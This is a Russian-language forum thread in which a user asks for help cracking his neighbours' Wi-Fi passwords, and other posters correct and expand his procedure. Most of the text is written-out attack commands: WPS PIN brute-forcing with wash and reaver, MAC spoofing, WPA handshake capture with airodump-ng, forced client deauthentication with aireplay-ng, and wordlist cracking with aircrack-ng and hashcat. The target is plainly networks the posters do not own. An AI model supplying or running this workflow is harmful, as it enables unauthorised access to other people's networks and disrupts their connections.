наконец то после долгих мучений, анализа нескольких гигов не русских видеозаписей до меня почти что дошло как ломать соседский вайфай подскажите точнее дополните инструкцию, разъясните что не так и как надо!? имеется адаптер RTL8187L из винды 7 гружу виртуальную машину VMware workstation образ BackTrack 5 R3 чтобы печатать в окне виртуальной машины нажимаю ctrl+G чтобы выйти нажимаем ctrl+alt... пишу STARTX запускается система! адаптер USB подключаю, сразу он не определяется только после того как кликнуть на иконку юсб внизу справа в трее! открываю консоль или терминал пишу airmon-ng -определяется адаптер,драва airmon-ng start wlan0 -переводим в режим мониторинга (появился mon0) airodump-ng mon0 - сканируем доступные роутеры нажимаем ctrl+C -остановить процес wash -i mon0 -определяем уязвимые цели, yes-заблокирована, no- возможен подбор! нажимаем ctrl+C -останавливаем процес копируем BSSID жертвы reaver -i mon0 -b (вставляем BSSID) -vv -L -ищет канал при удачном поиске будет автоматически подбирать пинкод сети! отображается в % за 8 часов у меня было 40% и дальше виснет, пробывал 2 раза(((
пробывал и вот так! airmon-ng airmon-ng start wlan0 ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifconfig mon0 up airodump-ng mon0 запоминаем ESSID , BSSID, Сh, Station airodump-ng -c (Ch) -w wpa --bssid (жертвы) --ivs mon0 и всё капец на этом выдаёт ошибку что то типо нет wpa-01.ivs но у меня по инструкции дальше открываю новое окно aireplay-ng -0 5 -a (BSSID вставить) -c (Station вставить) mon0 повторяем попытки пока не появиться WPAhandshake!!! окно можно закрыть aircrack-ng -w desktop/wordlist.txt wpa-01.ivs и появляется долгожданный KEY FOUND но не хрена ведь блин...что делать, как добиться результата???
По reaver читаем: http://habrahabr.ru/company/xakep/blog/143834/ По aircrack-ng: airodump-ng --bssid Точки доступа -w cap mon0 вместо: airodump-ng -c (Ch) -w wpa --bssid (жертвы) --ivs mon0 Так же почитайте: http://forum.antichat.ru/thread309017.html
Команду правильно задай: reaver -i mon0 -b (bssid) -a -vv -c (ch) (bssid) - Мас жертвы (ch) - канал жертвы Здесь тоже, команду правильно задай: airodump-ng -w wpa --bssid (жертвы) -c (Ch) mon0 aircrack-ng -0 /root/wpa-01.cap -w desktop/wordlist.txt
он мне выдал вот такое: airodump-ng --bssid Точки доступа -w cap mon0 ioctl (SIOCSIFFLAGS) failed: Operation not possible due to RF-kill
airodump-ng -w wpa --bssid (жертвы) -c (Ch) mon0 выдал вот это: airodump-ng: invalid option -- '?' "airodump-ng --help" for help.
Когда ты задавал команду: airmon-ng Надо выбирать wlan1 с чипсетом RTL8187L, а wlan0 это встроенная сетевая. У меня так показывает.
проделыл всё как на видео, и всё безтолку че то не хрена не получается блин...вроде как пол пути уже пройдено, но какая нить ерунда да вылезет...че ещё надо то...на видео всё быстренько, повторяю и ноль толку... всё проделал как на видео, пишет либо по русски говоря что через 60 секунд повторится попытка, я понимаю что роутер сбрасывает подбор и разрешает через минуту, короче хрен.... или начинает подбирать и выдаёт проценты 0,02% и так 8 часов опять без толку...я уже могу только догадываться что или маршрутизаторы пошли какие то без уязвимостей или прошивки все мои соседи разом поменяли где уже испралены эти дыры...или есть ещё варианты раздобыть пароль???
Пробуй "Kali Linux 1.0.5" или "BackTrack 5R3 Gnome" или "Wifislax 4.6" - может с той сборкой не то? Попробуй. Ещё попробуй не с виртуальной машины грузиться, а нарезать на флэшку и загрузиться с Live USB
вот эта сборка которою я юзаю http://rutracker.org/forum/viewtopic.php?t=4153616 может быть кто нибудь поделится ссылкой на ту сборку которой он действительно добивался результата!!!???
http://www.kali.org/downloads/ Kali Linux 64 torrent ___________________________ http://www.backtrack-linux.org/downloads/ BackTrack 5R3 Gnome - 32 Эти сборки отлично у меня работают, попробуй!
Попробуй еще один вариант запустить Backtrack с флешки так лутче работает и быстрее намного и должна твоя проблема решиться. Вот тебе прога что бы зделать загрузочную флешку: http://dfiles.ru/files/m8fginwbz Отпишись как попробуешь.
я думаю с диска загрузиться будет то же самое так ведь??? ту же сборку что с виртуалки грузил...короче напишу как протестируюб всё!!!
С флешки лутче работать будет с диска даже и не пробывал потому что это гиблое дело лутче на флеху кидай.
Ну да с флехи и правдо работает быстрее, но не какого результата я так и не получил блин, хотя все команды вводил правильно!!! похоже действительно все соседи поставили себе роутеры wifi а сами подключены кабелем и не пользуются беспроводным...сетей вокруге куча при сканировании bssid появляется а station по штуке 2-4 при том что в нижних строчках на месте bssid появляется че то типо не определено, только по английски...начинаю сканить конкретную сеть по очередности station в некоторых вообще не определяется а в тех где появляется там сигнал ваще слабый((((блин как раздобыть пароли соседей???
правильно тебе написали в начале прочти вай фай для чайников,там подробно все написано. iwconfig -видим список беспроводных адаптеров (ifconfig -все адаптеры) airmon-ng -включаем режим монитора на нужном тебе вай фай адаптере wlan0,wlan1 (iwconfig поможет) далее нужно собрать хендшейки. airodump-ng mon0(mon1) -можно оставить и так ,когда словишь-увидишь, или с указанием нужного bssid(тд). И здесь тебе нужно -ТЕРПЕНИЕ. ( у меня 2 недели ноут стоял рядом с ПК, сутками не выключал .ноут ловит хендши ,на ПК хашкат -и все это сутками.) в airodump смотрим у кого есть клиенты,твоя задача - словить дампы подключения (отключения) клиента- к точке доступа. 1)можно просто ждать (воможно долго) 2)попробовать насильно отключить клиента (aireplay-ng) 3)besside-ng -я так понял совсем жестокий способ (очень много помех если включишь без указания конкретного бссид ,даже если укажешь бссид ,то другие т.д. которые на этом канале тоже будут вести себя неадекватно.) но удобная ,простая комманда ,сама сохраняет хендшеки в root\besside-ng __.cap .log вот как-то так. удачи тебе . и не забывай сохранять хендшейки на флешку!